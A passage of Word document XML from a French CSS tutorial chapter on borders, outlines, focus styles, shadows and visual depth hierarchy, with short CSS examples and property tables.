      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>visibility: hidden</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> aussi, mais conserve l'espace.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>flow-root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> crée un contexte de formatage de bloc qui confine les marges à l'intérieur du conteneur.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>gap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> n'ajoute de l'espace qu'entre les éléments, jamais sur les bords du conteneur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>14. Bordures, ombres et profondeur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Donner du relief sans surcharger : les outils visuels qui séparent, hiérarchisent et guident le regard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 15 · Niveau : Débutant · Prérequis : chapitre 13</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Composer des bordures cohérentes et accessibles au focus.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Utiliser les rayons et les ombres avec discernement.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Créer une hiérarchie visuelle par la profondeur.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Éviter les effets qui nuisent à la lisibilité.</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Adapter les effets au mode sombre et au contraste élevé.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>14.1 Bordures : délimiter sans alourdir</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une bordure sépare deux zones. Elle occupe de l'espace dans la boîte (contrairement à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>outline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) et se compose d'une épaisseur, d'un style et d'une couleur. Le style </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>solid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> suffit dans la majorité des cas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre usages de la bordure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.carte   { border: 1px solid #e8edf1; }</w:t>
        <w:br/>
        <w:t>.alerte  { border-inline-start: 4px solid #a63a32; }</w:t>
        <w:br/>
        <w:t>.bouton  { border: 2px solid currentColor; }</w:t>
        <w:br/>
        <w:t>.separe  { border-block-end: 1px solid #d5dee6; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Bordure en pointillés pour une zone de dépôt */</w:t>
        <w:br/>
        <w:t>.depot   { border: 2px dashed #c9d6e2; border-radius: 8px; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.48 — Six propriétés de contour</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57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Propriété</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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370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Remarque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>border-width</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Épaisseur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3702"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1 px suffit pour séparer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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border-style</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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Trait</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="370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solid</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dashed</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dotted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>border-color</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Couleur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3702"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Souvent une nuance de neutre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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border-radius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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Arrondi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="370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Un seul rayon crée une identité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>outline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contour de focus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3702"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Hors du flux, ne décale rien</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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outline-offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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Écart du contour</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="370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Améliore la visibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un focus visible sur tous les fonds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:focus-visible {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  outline: 3px solid #e0a21b;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  outline-offset: 3px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-radius: 2px;</w:t>
        <w:br/>
        <w:t>}</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`OUTLINE: NONE` SANS REMPLACEMENT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Supprimer le contour de focus est l'une des erreurs d'accessibilité les plus fréquentes. Si le contour natif est inesthétique, remplacez-le par un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>outline</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> personnalisé ou un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>box-shadow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, jamais par rien.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les rayons se déclarent de façon homogène (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>border-radius: 8px</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) ou asymétrique (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>border-radius: 16px 16px 0 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Un rayon trop grand sur un petit élément produit une forme de pilule involontaire ; utilisez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>border-radius: 999px</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> uniquement quand c'est l'effet recherché.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>14.2 Ombres : une illusion de profondeur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une ombre simule une source de lumière. Deux paramètres déterminent sa crédibilité : le décalage vertical (plus l'ombre est haute, plus l'objet semble proche du support) et le flou (plus il est grand, plus l'objet semble loin).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une échelle de profondeur à quatre niveaux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.niveau-1 { box-shadow: 0 1px 2px rgb(15 46 76 / 8%); }</w:t>
        <w:br/>
        <w:t>.niveau-2 { box-shadow: 0 4px 8px rgb(15 46 76 / 10%); }</w:t>
        <w:br/>
        <w:t>.niveau-3 { box-shadow: 0 12px 24px rgb(15 46 76 / 14%); }</w:t>
        <w:br/>
        <w:t>.niveau-4 { box-shadow: 0 24px 48px rgb(15 46 76 / 18%); }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2476500"/>
            <wp:docPr id="23" name="Picture 23"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f21.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2476500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.21 — Deux façons de séparer deux surfaces</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une ombre se superpose à une bordure sans la remplacer. Sur un fond déjà teinté, une ombre seule devient invisible : ajoutez une bordure très fine (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1px solid rgb(0 0 0 / 6%)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) pour garantir la séparation en mode sombre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois variantes d'ombre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Ombre interne pour un champ enfoncé */</w:t>
        <w:br/>
        <w:t>.champ { box-shadow: inset 0 1px 2px rgb(15 46 76 / 8%); }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Ombre colorée pour un bouton principal */</w:t>
        <w:br/>
        <w:t>.bouton--principal {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  box-shadow: 0 6px 16px rgb(15 46 76 / 28%);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Aucune ombre en contraste élevé */</w:t>
        <w:br/>
        <w:t>@media (forced-colors: active) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .carte { box-shadow: none; border: 1px solid CanvasText; }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>14.3 Hiérarchie visuelle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La profondeur sert à indiquer ce qui est au-dessus de quoi : une boîte de dialogue au-dessus de la page, un menu déroulant au-dessus du contenu, une carte au-dessus du fond. Elle ne sert pas à décorer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.49 — Cinq niveaux de profondeur et leur usage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8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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="163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Niveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="458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Traitement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1639"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4589"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
